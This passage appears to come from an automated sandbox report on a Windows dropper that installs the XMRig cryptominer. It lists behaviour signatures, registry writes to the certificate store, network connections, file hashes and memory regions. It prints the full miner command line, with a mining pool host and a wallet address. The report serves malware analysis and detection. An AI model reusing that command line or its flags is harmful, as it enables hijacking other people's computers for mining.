memory/1460-48-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-49-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-50-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-51-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-52-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-53-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-54-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-55-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-56-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-57-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-58-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-59-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-60-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-61-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-62-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-63-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-64-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-65-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-66-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-67-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-68-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-69-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-70-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-71-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-72-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-73-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-74-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-75-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-76-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-77-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-78-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-79-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-80-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-81-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-82-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-83-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-84-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:54
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1810s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3712 wrote to memory of 1884 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3712 wrote to memory of 1884 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1884-16-0x0000018721390000-0x00000187213B0000-memory.dmp
memory/1884-17-0x0000018722C90000-0x0000018722CB0000-memory.dmp
memory/1884-18-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-19-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-20-0x0000018722CB0000-0x0000018722CD0000-memory.dmp
memory/1884-21-0x0000018722CD0000-0x0000018722CF0000-memory.dmp
memory/1884-22-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-23-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-24-0x0000018722CB0000-0x0000018722CD0000-memory.dmp
memory/1884-25-0x0000018722CD0000-0x0000018722CF0000-memory.dmp
memory/1884-26-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-27-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-28-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-29-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-30-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-31-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-32-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-33-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-34-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-35-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-36-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-37-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-38-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-39-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-40-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-41-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-42-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-43-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-44-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-45-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-46-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-47-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-48-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-49-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-50-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-51-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-52-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-53-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-54-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-55-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-56-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-57-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-58-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-59-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-60-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-61-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-62-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-63-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-64-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-65-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-66-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-67-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-68-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-69-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-70-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-71-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-72-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-73-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-74-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-75-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-76-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-77-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-78-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-79-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-80-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-81-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-82-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-83-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-84-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:54
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 220 wrote to memory of 2280 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 220 wrote to memory of 2280 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 52.111.227.14:443 | | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2280-16-0x00000163AD3F0000-0x00000163AD410000-memory.dmp
memory/2280-17-0x00000163AD640000-0x00000163AD660000-memory.dmp
memory/2280-18-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-20-0x00000163AEE10000-0x00000163AEE30000-memory.dmp
memory/2280-19-0x00000163AEE30000-0x00000163AEE50000-memory.dmp
memory/2280-21-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-22-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-25-0x00000163AEE10000-0x00000163AEE30000-memory.dmp
memory/2280-24-0x00000163AEE30000-0x00000163AEE50000-memory.dmp
memory/2280-23-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-26-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-27-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-28-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-29-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-30-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-31-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-32-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-33-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-34-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-35-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-36-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-37-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-38-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-39-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-40-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-41-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-42-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-43-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-44-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-45-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-46-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-47-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-48-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-49-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-50-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-51-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-52-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-53-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-54-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-55-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-56-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-57-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-58-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-59-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-60-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-61-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-62-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-63-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-64-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-65-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-66-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-67-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-68-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-69-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-70-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-71-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-72-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-73-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-74-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-75-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-76-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-77-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-78-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-79-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-80-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-81-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-82-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-83-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-84-0x00007FF752200000-0x00007FF752D03000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 18:04
Platform
win10v2004-20240508-en
Max time kernel
1772s
Max time network
1778s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
